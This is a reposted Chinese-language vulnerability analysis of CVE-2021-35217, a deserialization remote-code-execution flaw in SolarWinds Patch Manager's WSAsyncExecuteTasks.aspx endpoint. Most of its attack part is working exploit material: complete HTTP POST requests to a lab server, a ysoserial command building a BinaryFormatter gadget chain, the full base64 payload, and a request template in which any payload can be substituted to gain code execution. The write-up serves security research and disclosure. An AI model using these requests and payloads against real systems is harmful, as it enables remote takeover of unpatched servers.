CVE-2021-35217 SolarWinds PM WSAsyncExecuteTasks RCE
source link: https://y4er.com/post/cve-2021-35217-solarwinds-patch-manager-wsasyncexecutetasks-rce/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
CVE-2021-35217 SolarWinds PM WSAsyncExecuteTasks RCE
2021-10-23 代码审计 CVE SolarWinds
继推特@testanull的研究文章,分析另一个RCE CVE-2021–35217。
漏洞位置出现在 http://192.168.137.130:8787/Orion/PM/Controls/WSAsyncExecuteTasks.aspx
在OnInit()初始化时,从request中反序列化出JSONData传递给ExecuteItem()方法。
跟进ExecuteItem()方法
123行到138行从JSONData中取ServerControlDefinition,用|
,=
分割放入var parameters = new Dictionary<String, String>();
这个字符串类型的键值对。
140行从parameters中取Control值加载控件,那么控件值可控。141行判断控件对象是否是ScmResourceBaseAsync类型,不是的话154行直接return。
那么先找ScmResourceBaseAsync类型的控件。
我用的是~/Orion/PM/Controls/Update/GroupsMissingUpdateCtrl.ascx
此时构造请求
POST /Orion/PM/Controls/WSAsyncExecuteTasks.aspx HTTP/1.1
Host: 192.168.137.130:8787
Content-Length: 3370
Cache-Control: max-age=0
Origin: http://192.168.137.130:8787
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.137.130:8787/Orion/PM/Controls/WSAsyncExecuteTasks.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: __AntiXsrfToken=49d368c51e2b4bffbbeae1904e825850; Orion_IsSessionExp=TRUE; ASP.NET_SessionId=3iel4j1s0uuvy3n0dkpugw30; .ASPXAUTH=B57BE373D7D9F57BE66003BCBCD663097E6FD5979FA91CA0965925EF9F662DFAB27DBB05B583F996018A5F7D78F2C6A2359918791EE44E7DACF4031FAB5E393924CB249702AED0D100289B94588277792D5C27B5C4E3089926CA43FD2733491A66D224CFF83D7803E25CF52EAEC35C2723BAD30A762E1EBA62543BFB203B6E5B3CAC97CCBF32C724994B67E47320F56FC2498C105BB89DE7917FE3923401C0B86C6B1A8ACB583A763D89344AA7561E1F; XSRF-TOKEN=gHBB9ZU1MA4DQazR0Fburx9Yjf05BEMOTYPUmxGLL1s=
Connection: close
[{"ResourceId":null,"Hash":null,"ServerMethod":null,"ServerControlDefinition":"Control=~/Orion/PM/Controls/Update/GroupsMissingUpdateCtrl.ascx|config.ParametersSerial=test|config.PreLoadMethodSerial=test;test","Parameters":[]}]
SolarWinds.PM.Web.dll!SolarWinds.PM.Web.Resources.ScmResourceBaseAsync.OnLoad(System.EventArgs e)
发现如果PreLoadMethodSerial不为空就会进入反序列化
而反序列化更是直接使用了BinaryFormatter,所以直接可以RCE。
C:\Users\admin\Downloads\ysoserial-1.34\Release>ysoserial.exe -f binaryformatter -g SessionSecurityToken -c "ping localhost -t"
AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uSWRlbnRpdHlNb2RlbCwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAADBTeXN0ZW0uSWRlbnRpdHlNb2RlbC5Ub2tlbnMuU2Vzc2lvblNlY3VyaXR5VG9rZW4BAAAADFNlc3Npb25Ub2tlbgcCAgAAAAkDAAAADwMAAADRBQAAAkAUU2VjdXJpdHlDb250ZXh0VG9rZW5AB1ZlcnNpb26DQBlTZWN1cmVDb252ZXJzYXRpb25WZXJzaW9umShodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzAyL3NjQAJJZINACUNvbnRleHRJZINAA0tleZ8BAUANRWZmZWN0aXZlVGltZYNACkV4cGlyeVRpbWWDQBBLZXlFZmZlY3RpdmVUaW1lg0ANS2V5RXhwaXJ5VGltZYNAD0NsYWltc1ByaW5jaXBhbEAKSWRlbnRpdGllc0AISWRlbnRpdHlADkJvb3RTdHJhcFRva2VumtQEQUFFQUFBRC8vLy8vQVFBQUFBQUFBQUFNQWdBQUFGNU5hV055YjNOdlpuUXVVRzkzWlhKVGFHVnNiQzVGWkdsMGIzSXNJRlpsY25OcGIyNDlNeTR3TGpBdU1Dd2dRM1ZzZEhWeVpUMXVaWFYwY21Gc0xDQlFkV0pzYVdOTFpYbFViMnRsYmowek1XSm1NemcxTm1Ga016WTBaVE0xQlFFQUFBQkNUV2xqY205emIyWjBMbFpwYzNWaGJGTjBkV1JwYnk1VVpYaDBMa1p2Y20xaGRIUnBibWN1VkdWNGRFWnZjbTFoZEhScGJtZFNkVzVRY205d1pYSjBhV1Z6QVFBQUFBOUdiM0psWjNKdmRXNWtRbkoxYzJnQkFnQUFBQVlEQUFBQXZ3VThQM2h0YkNCMlpYSnphVzl1UFNJeExqQWlJR1Z1WTI5a2FXNW5QU0oxZEdZdE9DSS9QZzBLUEU5aWFtVmpkRVJoZEdGUWNtOTJhV1JsY2lCTlpYUm9iMlJPWVcxbFBTSlRkR0Z5ZENJZ1NYTkpibWwwYVdGc1RHOWhaRVZ1WVdKc1pXUTlJa1poYkhObElpQjRiV3h1Y3owaWFIUjBjRG92TDNOamFHVnRZWE11YldsamNtOXpiMlowTG1OdmJTOTNhVzVtZUM4eU1EQTJMM2hoYld3dmNISmxjMlZ1ZEdGMGFXOXVJaUI0Yld4dWN6cHpaRDBpWTJ4eUxXNWhiV1Z6Y0dGalpUcFRlWE4wWlcwdVJHbGhaMjV2YzNScFkzTTdZWE56WlcxaWJIazlVM2x6ZEdWdElpQjRiV3h1Y3pwNFBTSm9kSFJ3T2k4dmMyTm9aVzFoY3k1dGFXTnliM052Wm5RdVkyOXRMM2RwYm1aNEx6SXdNRFl2ZUdGdGJDSStEUW9nSUR4UFltcGxZM1JFWVhSaFVISnZkbWxrWlhJdVQySnFaV04wU1c1emRHRnVZMlUrRFFvZ0lDQWdQSE5rT2xCeWIyTmxjM00rRFFvZ0lDQWdJQ0E4YzJRNlVISnZZMlZ6Y3k1VGRHRnlkRWx1Wm04K0RRb2dJQ0FnSUNBZ0lEeHpaRHBRY205alpYTnpVM1JoY25SSmJtWnZJRUZ5WjNWdFpXNTBjejBpTDJNZ2NHbHVaeUJzYjJOaGJHaHZjM1FnTFhRaUlGTjBZVzVrWVhKa1JYSnliM0pGYm1OdlpHbHVaejBpZTNnNlRuVnNiSDBpSUZOMFlXNWtZWEprVDNWMGNIVjBSVzVqYjJScGJtYzlJbnQ0T2s1MWJHeDlJaUJWYzJWeVRtRnRaVDBpSWlCUVlYTnpkMjl5WkQwaWUzZzZUblZzYkgwaUlFUnZiV0ZwYmowaUlpQk1iMkZrVlhObGNsQnliMlpwYkdVOUlrWmhiSE5sSWlCR2FXeGxUbUZ0WlQwaVkyMWtJaUF2UGcwS0lDQWdJQ0FnUEM5elpEcFFjbTlqWlhOekxsTjBZWEowU1c1bWJ6NE5DaUFnSUNBOEwzTmtPbEJ5YjJObGMzTStEUW9nSUR3dlQySnFaV04wUkdGMFlWQnliM1pwWkdWeUxrOWlhbVZqZEVsdWMzUmhibU5sUGcwS1BDOVBZbXBsWTNSRVlYUmhVSEp2ZG1sa1pYSStDdz09AQEBAQEL
Response.Write(HttpServerUtility.UrlTokenEncode(Encoding.UTF8.GetBytes("AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uSWRlbnRpdHlNb2RlbCwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRv...QEL")));
POST /Orion/PM/Controls/WSAsyncExecuteTasks.aspx HTTP/1.1
Host: 192.168.137.130:8787
Content-Length: 3370
Cache-Control: max-age=0
Origin: http://192.168.137.130:8787
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.137.130:8787/Orion/PM/Controls/WSAsyncExecuteTasks.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: __AntiXsrfToken=49d368c51e2b4bffbbeae1904e825850; Orion_IsSessionExp=TRUE; ASP.NET_SessionId=3iel4j1s0uuvy3n0dkpugw30; .ASPXAUTH=B57BE373D7D9F57BE66003BCBCD663097E6FD5979FA91CA0965925EF9F662DFAB27DBB05B583F996018A5F7D78F2C6A2359918791EE44E7DACF4031FAB5E393924CB249702AED0D100289B94588277792D5C27B5C4E3089926CA43FD2733491A66D224CFF83D7803E25CF52EAEC35C2723BAD30A762E1EBA62543BFB203B6E5B3CAC97CCBF32C724994B67E47320F56FC2498C105BB89DE7917FE3923401C0B86C6B1A8ACB583A763D89344AA7561E1F; XSRF-TOKEN=gHBB9ZU1MA4DQazR0Fburx9Yjf05BEMOTYPUmxGLL1s=
Connection: close
[{"ResourceId":null,"Hash":null,"ServerMethod":null,"ServerControlDefinition":"Control=~/Orion/PM/Controls/Update/GroupsMissingUpdateCtrl.ascx|config.ParametersSerial=HERE IS YOUR PAYLOAD|config.PreLoadMethodSerial=SolarWinds.Orion.Core.Models.Actions.Contexts.AlertingActionContext, SolarWinds.Orion.Actions.Models;asd","Parameters":[]}]
替换HERE IS YOUR PAYLOAD
为你的payload,然后就RCE了。
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK